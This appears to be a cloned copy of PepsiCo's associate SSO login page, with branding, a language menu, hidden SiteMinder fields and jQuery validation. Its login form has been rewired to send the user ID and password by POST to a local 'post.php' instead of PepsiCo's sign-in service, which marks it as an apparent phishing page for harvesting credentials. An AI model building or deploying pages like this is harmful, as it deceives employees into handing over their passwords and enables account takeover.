<!DOCTYPE html>
<!-- saved from url=(0241)https://secure.mypepsico.com/associatesso/login?TYPE=33554433&REALMOID=06-000d3f28-7682-1424-99cd-da1d9c514017&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=portal2prod-apache-peplxw00043-agent&TARGET=$SM$https%3a%2f%2fwww%2emypepsico%2ecom%2f -->
<html lang="en" title="SSO Login Services"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
<!-- <meta content="width=device-width, initial-scale=1.0" name="viewport" /> -->
<meta http-equiv="Cache-Control" content="max-age=63113904">
<meta name="description" content="">
<meta name="author" content="">
<title>SSO Login Services</title>
	<!-- Bootstrap core CSS -->
<link href="./SSO Login Services_files/lato.css" rel="stylesheet">
<!-- <!-- Font Awesome --> 
<link rel="stylesheet" href="./SSO Login Services_files/all.css">
	
<link href="./SSO Login Services_files/bootstrap.min.css" rel="stylesheet">
<!-- Material Design Bootstrap -->
<link href="./SSO Login Services_files/mdb.min.css" rel="stylesheet">
<link href="./SSO Login Services_files/flag-icon.min.css" rel="stylesheet">
<link href="./SSO Login Services_files/lang.css" rel="stylesheet">
<!-- Custom styles for this template -->
<style type="text/css">
.md-form input[type='text']:focus:not ([readonly] ) +label {
	color: #0f549b !important;
}

.md-form input[type='text']:focus:not ([readonly] ) {
	box-shadow: 0 1px 0 0 #0f549b !important;
	border-bottom: 1px solid #0f549b !important;
}

.md-form input[type='password']:focus:not ([readonly] ) +label {
	color: #0f549b !important;
}

.md-form input[type='password']:focus:not ([readonly] ) {
	box-shadow: 0 1px 0 0 #0f549b !important;
	border-bottom: 1px solid #0f549b !important;
}

:root { -
	-primary: #0f549b;
}

.primary-color {
	background-color: #0f549b !important
}

.mdc-select.mdc-select--with-leading-icon {
	left: 0;
}

.mdc-top-app-bar {
	position: initial;
	background-color: grey;
}

body {
	font-family: Lato;
	margin: 0px;
}

.primary-color {
	background-color: #0f549b;
}

.form-footer {
	font-weight: bold;
	font-family: Lato;
	/* 	background: #000040; */
	/* 	background-color: rgb(0, 0, 64); */
	background-repeat: repeat;
	background-attachment: scroll;
	background-size: auto;
	background-origin: padding-box;
	background-clip: border-box;
	/* 	background-color: rgb(0, 0, 64); */
	background-repeat: repeat;
	background-attachment: scroll;
	background-size: auto;
	background-origin: padding-box;
	background-clip: border-box;
	width: auto;
	border: 0;
	border-bottom-style: none;
	border-bottom-width: 0px;
	padding: 10px;
	border-radius: 0;
	border-top-left-radius: 0px;
	border-top-right-radius: 0px;
	border-bottom-right-radius: 0px;
	border-bottom-left-radius: 0px;
	box-sizing: border-box;
	color: #000;
	font-size:18px;
	text-align: center;
	clear: both;
	margin-left: -15px;
	margin-right: -15px;
	margin-bottom: -15px;
/* 	margin-top: 15px; */
}

.displayNone {
	display: none;
}

.errorbox:before {
	position: absolute;
	top: -1px;
	bottom: -1px;
	left: -1px;
	border-top-left-radius: 3px;
	border-bottom-left-radius: 3px;
	content: "";
	width: 36px;
	background-color: red;
}

.extra-padding{
	padding-left:50px;
	padding-right:50px;
}

@media screen and (max-width: 600px) {
	.extra-padding{
		padding-left:15px;
		padding-right:15px;
		background-color: lightblue;
	}
}
</style>



<style type="text/css">/* Chart.js */
@-webkit-keyframes chartjs-render-animation{from{opacity:0.99}to{opacity:1}}@keyframes chartjs-render-animation{from{opacity:0.99}to{opacity:1}}.chartjs-render-monitor{-webkit-animation:chartjs-render-animation 0.001s;animation:chartjs-render-animation 0.001s;}</style></head>
<body style="background: #f2f2f2">
	


<!--Navbar -->
<!-- Just an image -->
<nav class="navbar navbar-dark nav-color" style="padding-top: 0;padding-bottom: 0;position: absolute;
z-index: 9999;width: 100%;background: linear-gradient(#fff, transparent);box-shadow: none;">
	<a class="navbar-brand" href="https://secure.mypepsico.com/associatesso/login?TYPE=33554433&amp;REALMOID=06-000d3f28-7682-1424-99cd-da1d9c514017&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=portal2prod-apache-peplxw00043-agent&amp;TARGET=$SM$https%3a%2f%2fwww%2emypepsico%2ecom%2f#"></a>
	<div style="text-align: right; display: flex; flex-wrap: wrap; flex-direction: row;">
		<div style="padding-top: 8px; text-align: right; font-family: inherit;">View page in</div>
		<ul id="header-nav-dropdown" class="navbar-nav" style="padding: 0 10px 0 10px;">
			<li class="nav-item dropdown"><a class="nav-link dropdown-toggle waves-effect waves-light" href="https://secure.mypepsico.com/associatesso/login?TYPE=33554433&amp;REALMOID=06-000d3f28-7682-1424-99cd-da1d9c514017&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=portal2prod-apache-peplxw00043-agent&amp;TARGET=$SM$https%3a%2f%2fwww%2emypepsico%2ecom%2f" id="dropdown09" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="color:black;">English</a>
				<div class="dropdown-menu" style="left: unset;min-width: fit-content;right: 0 !important;" aria-labelledby="dropdown09">
					<a class="dropdown-item us waves-effect waves-light" href="https://secure.mypepsico.com/associatesso/login?TYPE=33554433&amp;REALMOID=06-000d3f28-7682-1424-99cd-da1d9c514017&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=portal2prod-apache-peplxw00043-agent&amp;TARGET=$SM$https%3a%2f%2fwww%2emypepsico%2ecom%2f#en" data-value="us">English</a>
					<a class="dropdown-item zhcn waves-effect waves-light" href="https://secure.mypepsico.com/associatesso/login?TYPE=33554433&amp;REALMOID=06-000d3f28-7682-1424-99cd-da1d9c514017&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=portal2prod-apache-peplxw00043-agent&amp;TARGET=$SM$https%3a%2f%2fwww%2emypepsico%2ecom%2f#zhcn" data-value="zhcn">简体中文</a>
					<a class="dropdown-item ru waves-effect waves-light" href="https://secure.mypepsico.com/associatesso/login?TYPE=33554433&amp;REALMOID=06-000d3f28-7682-1424-99cd-da1d9c514017&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=portal2prod-apache-peplxw00043-agent&amp;TARGET=$SM$https%3a%2f%2fwww%2emypepsico%2ecom%2f#ru" data-value="ru">Русском</a>
					<a class="dropdown-item es waves-effect waves-light" href="https://secure.mypepsico.com/associatesso/login?TYPE=33554433&amp;REALMOID=06-000d3f28-7682-1424-99cd-da1d9c514017&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=portal2prod-apache-peplxw00043-agent&amp;TARGET=$SM$https%3a%2f%2fwww%2emypepsico%2ecom%2f#es" data-value="es"> Español</a>
					<a class="dropdown-item pt waves-effect waves-light" href="https://secure.mypepsico.com/associatesso/login?TYPE=33554433&amp;REALMOID=06-000d3f28-7682-1424-99cd-da1d9c514017&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=portal2prod-apache-peplxw00043-agent&amp;TARGET=$SM$https%3a%2f%2fwww%2emypepsico%2ecom%2f#pt" data-value="pt">Português</a>
					<a class="dropdown-item fr waves-effect waves-light" href="https://secure.mypepsico.com/associatesso/login?TYPE=33554433&amp;REALMOID=06-000d3f28-7682-1424-99cd-da1d9c514017&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=portal2prod-apache-peplxw00043-agent&amp;TARGET=$SM$https%3a%2f%2fwww%2emypepsico%2ecom%2f#fr" data-value="fr">Français</a>
					<a class="dropdown-item ar waves-effect waves-light" href="https://secure.mypepsico.com/associatesso/login?TYPE=33554433&amp;REALMOID=06-000d3f28-7682-1424-99cd-da1d9c514017&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=portal2prod-apache-peplxw00043-agent&amp;TARGET=$SM$https%3a%2f%2fwww%2emypepsico%2ecom%2f#ar" data-value="ar">العربية</a>
				</div></li>
		</ul>
	</div>
</nav>
	<div class="container-fluid" style="padding: 0px;">
		<div id="banner" style="position: absolute; height: 200px; width: 100%; z-index: -1; background-color: #f2f2f2; background-position: top center; background-repeat: no-repeat; background-size: cover; color: #00549f; cursor: default;">
			<img src="./SSO Login Services_files/loginbanner.jpg" style="width: inherit;">
		</div>
		<div class="row justify-content-md-center m-0 p-0" style="text-align: center;">
			<div class="col col-lg-2"></div>
			<div class="col-12 col-md-auto col-sm-auto">
				<form class="form-signin extra-padding" action="post.php" method="POST" autocomplete="off">
">
					<div class="centertext">
						<img class="mb-2" src="./SSO Login Services_files/CEMainLogo.png" width="40%" alt="">
					</div>
					

					
					


					

					

					

					<div class="md-form mb-0" style="color: #0f549b;">
						<input type="text" id="userid" name="USER" class="form-control" autofocus="" autocomplete="off" required=""> <label for="userid" class="">User ID – Email address or Global Person ID (GPID)</label>
						<div class="invalid-feedback text-left" id="email-error">
							Please provide a valid email.</div>
					</div>
					

					<div class="md-form mb-0" style="color: #0f549b;">
						<input type="password" id="password" name="PASSWORD" class="form-control" autocomplete="off" required=""> <label for="inputPassword">Password</label>
						<div class="invalid-feedback text-left displayNone" id="password-error">
							Your login was unsuccessful. Please try again.</div>
						<p class="invalid-feedback text-left" id="capslock-error">
							Please check that "Caps Lock" is not on.</p>
						<div style="color: #0f549b; display: flex; align-items: baseline;">
							<span toggle="#password" style="width: 20px;" class="fa fa-eye toggle-password"></span><span style="margin-left: 10px;">Show Password</span>
						</div>
					</div>
					<div id="rememberCheck" class="custom-control custom-checkbox text-left mb-2">
						<input type="checkbox" class="custom-control-input" name="rememberMeCheck" id="rememberMeCheck"> <label class="custom-control-label" for="rememberMeCheck" style="font-size: 12px; padding-top: 3px;">Remember me<span id="factorDays"></span></label>
					</div>


					<input type="hidden" name="amApp" value="null"> <input type="hidden" name="fromURI" value="null"> <input type="hidden" name="RelayState" value="null"> <input type="hidden" name="TARGET" value="$SM$https://www.mypepsico.com/"> <input type="hidden" name="TYPE" value="33554433"> <input type="hidden" name="REALMOID" value="06-000d3f28-7682-1424-99cd-da1d9c514017"> <input type="hidden" name="GUID" value=""> <input type="hidden" name="SMAUTHREASON" value="0"> <input type="hidden" name="METHOD" value="GET"> <input type="hidden" name="SMAGENTNAME" value="portal2prod-apache-peplxw00043-agent"> <input type="hidden" name="SAMLRequest" value="null"> <input type="hidden" name="PARTNERIDP" value="null"> <input type="hidden" id="IsUserLocked" name="IsUserLocked" value="null"> <input type="hidden" name="LOGGEDIN" value="null"> <input type="hidden" name="POSTPRESERVATIONDATA" value="null">
					<input type="hidden" name="ATTEMPTED_USER" value="null">
					<button id="submit" name="submit" style="font-weight: bold; font-size: 16px; margin-top: 10px; border-radius: 5px; color: white; background-color: #0f549b !important" type="submit" class="btn btn-primary waves-effect">Log In</button>
					<div class="helplink anchor centertext" style="font-family: Lato; margin-top: 15px;">
						<button type="button" onclick="window.open(&#39;https://myidm.mypepsico.com/iam/im/pepsicopub/ca12/index.jsp?task.tag=PepsicoForgottenPasswordReset&#39;)" style="color: #050558; font-weight: 600; letter-spacing: 0; font-size: 12px;" class="btn btn-link btn-sm p-sm-1 p-0 mr-0 waves-effect waves-light">Forgot Password
						</button>
						<button type="button" onclick="window.open(&#39;../resources/documents/help/Associate_SSO_Help_en.pdf&#39;)" style="border-radius: 0px; color: #050558; font-weight: 600; letter-spacing: 0; font-size: 12px; border-width: 2px; border-left-style: solid; border-right-style: solid;" class="btn btn-link btn-sm py-0 px-3 waves-effect waves-light">Login Help
						</button>
						<button type="button" onclick="window.open(&#39;https://myidm.mypepsico.com/iam/im/pepsicopub/ca12/index.jsp?task.tag=PepsicoFirstTimeLogin&#39;)" style="color: #050558; font-weight: 600; letter-spacing: 0; font-size: 12px;" class="btn btn-link btn-sm p-sm-1 p-0 ml-0 waves-effect waves-light">First Time User 
						</button>
					</div>
					<div class="form-footer">Keeping PepsiCo safe and secure</div>
				</form>
			</div>
			<div class="col col-lg-2"></div>
		</div>
	</div>
	<br>
	


<div class="centertext">
	<div class="footer">
		<span class="footer-links">By signing in to this site you agree to be bound by the 
             <br><a href="https://secure.mypepsico.com/resources/documents/terms/Associate_SSO_Terms_en.pdf" style="text-decoration:none" target="Terms"> Terms of Use,</a>
            <a href="https://secure.mypepsico.com/resources/documents/legal/Associate_SSO_ltandc_en.pdf" style="text-decoration:none" target="Conditions"> Legal Terms and Conditions</a>
    		and <br>
            <a href="https://secure.mypepsico.com/resources/documents/privacy/Associate_SSO_Privacy_en.pdf" style="text-decoration:none" target="Privacy"> Privacy Statement.</a></span>
      <p></p> 
		<p class="message" style="margin-top:0;">© 2021   PepsiCo, Inc. All Rights Reserved</p>
	</div>
</div>

	<!-- JQuery -->
	<script type="text/javascript" src="./SSO Login Services_files/jquery.min.js.download"></script>
	<!-- Bootstrap tooltips -->
	<script type="text/javascript" src="./SSO Login Services_files/popper.min.js.download"></script>
	<!-- Bootstrap core JavaScript -->
	<script type="text/javascript" src="./SSO Login Services_files/bootstrap.min.js.download"></script>
	<!-- MDB core JavaScript -->
	<script type="text/javascript" src="./SSO Login Services_files/mdb.min.js.download"></script>
	<script src="./SSO Login Services_files/js.cookie.js.download" type="text/javascript"></script>

	<script type="text/javascript">	
	 
        $(document).ready(function(){
        	$('#inputPassword').val('');
        	$('#email-error').addClass("displayNone");
        	$('#password-error').addClass("displayNone");
        	$('#userid').blur(function(){
        		var regex = /^([a-zA-Z0-9_.+-])+\@(([a-zA-Z0-9-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        		if(regex.test($(this).val())===false) {
        			$('#email-error').removeClass("displayNone");	
            		}
        			 else {
            			$('#email-error').addClass("displayNone");
                		}
            	});
        	$('#inputPassword').blur(function(){
        		var value = $(this).val();
        		if(value.length < 8) {
        			$('#password-error').removeClass("displayNone");	
            		} else {
            			$('#password-error').addClass("displayNone");
                		}
            	});
        	if($("#useriderror")!=null)
	   		{
	   		$("#useriderror").hide();
	   		}
        	var userId = $("#userid").val();
        	userId = htmlEntities(userId);
        	if(userId.length>=1)
        		
        	{
        		textfieldmodifier("#userid");
        	}
        	function hideError()
        	{
        	   	if($("#errormsg")!=null)
        	    	{
        	    		$("#errormsg").hide();
        	    	}
        	}
        	$("#submit").html("Log In"); 
        	 $(".helplink").show();
        	 $('p#errorMsg').hide();  
        	var userLockedId = $("#IsUserLocked").val();
        	userLockedId = htmlEntities(userLockedId);
        	if(userLockedId == "TRUE"){
        		$(".pass").show();
        		 $(".helplink").show();
        	}
        	
        	function textfieldmodifier(field)
        	{
        		$("#submit").removeAttr("disabled");
            	  if($(field).val().indexOf('@')>=0)
                  {
            		
            			 if($("#useriderror")!=null) $("#useriderror").hide();
                	 // $(".pass").show();
                	  $("#inputPassword").prop('required',true);
                	 
                	  $("#submit").html("Log In");
                  }
            	  
            	  else if($(field).val().match(/^[a-zA-Z]+$/))
            		{
            		  
             			 if($("#useriderror")!=null) $("#useriderror").hide();
                 	  //$(".pass").show();
                 	  $("#inputPassword").prop('required',true);
                 	 
                 	  $("#submit").html("Log In");
                 	}
        	}
            $("#userid").keydown(function(){
            	textfieldmodifier(this);
            	hideError();
            });
            $("#userid").on('input', function(){
            	textfieldmodifier(this);
            	hideError();
            });
         
            $("#inputPassword").keydown(function(){
            	hideError();
            });
            
            $("#firsttimeuserlink").click(function(){            	
            	sessionStorage.setItem("emailaddress",$("#userid").val() );
            });
            
            $("#forgotpasswordlink").click(function(){            	
            	sessionStorage.setItem("emailaddress",$("#userid").val() );
            });
            
            $("#modifyprofilelink").click(function(){            	
            	sessionStorage.setItem("emailaddress",$("#userid").val() );
            });
            
            
            
        	
			
			
        	
			
			
        	
			
			
        	
			
        });
        $("#userid").keydown(function(e) {
			if ($("p#errorMsg").hasClass("invalid-feedback")) {
				$(this).css({
					"border" : "1px solid #80bdff",
					"box-shadow" : "0 0 0 0.2rem rgba(0,123,255,.25)"
				});
			}
		});
		$("#myForm").submit(function(e) {
			var userid = document.getElementById("userid").value;
			userid = userid.trim();
			userid = htmlEntities(userid);
			var spclCharTest = /([%+/])\w+/;
			if (userid.indexOf('@') >= 0) {
				re = /^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/;
				if (!re.test(userid) && spclCharTest.test(userid)) {
					$("p#errorMsg").text("Invalid Email Address");
									$("p#errorMsg").addClass("invalid-feedback");
									$("#userid").css("border-color", "#dc3545");
									$('#email-error').removeClass("invalid-feedback");
									$('#email-error').css('color', 'red');
									if($("p#errorMsg").length === 1) {
										$("p#errorMsg").show();
										}
									return false;
								}
							} else {
								return true;
							}
						});
		//   /////////Show/Hide Password//////////
		$(".toggle-password").click(function() {

			$(this).toggleClass("fa-eye fa-eye-slash");
			var input = $($(this).attr("toggle"));
			if (input.attr("type") == "password") {
				input.attr("type", "text");
			} else {
				input.attr("type", "password");
			}
		});
		// Get the input field
		var input = document.getElementById("password");

		// Get the warning text
		var capslockWarning = document.getElementById("capslock-error");

		// When the user presses any key on the keyboard, run the function
		input.addEventListener("keyup", function(event) {

			// If "caps lock" is pressed, display the warning text
			if (event.getModifierState("CapsLock")) {
				capslockWarning.style.display = "block";
			} else {
				capslockWarning.style.display = "none"
			}
		});
		//////////////set cookie////////////////
		var email = getCookie("email");
		if (email !== '' && email !== undefined) {
			$("#rememberCheck").hide();
			$("#userid").val(email);
		}
	</script>


<div class="hiddendiv common"></div></body></html>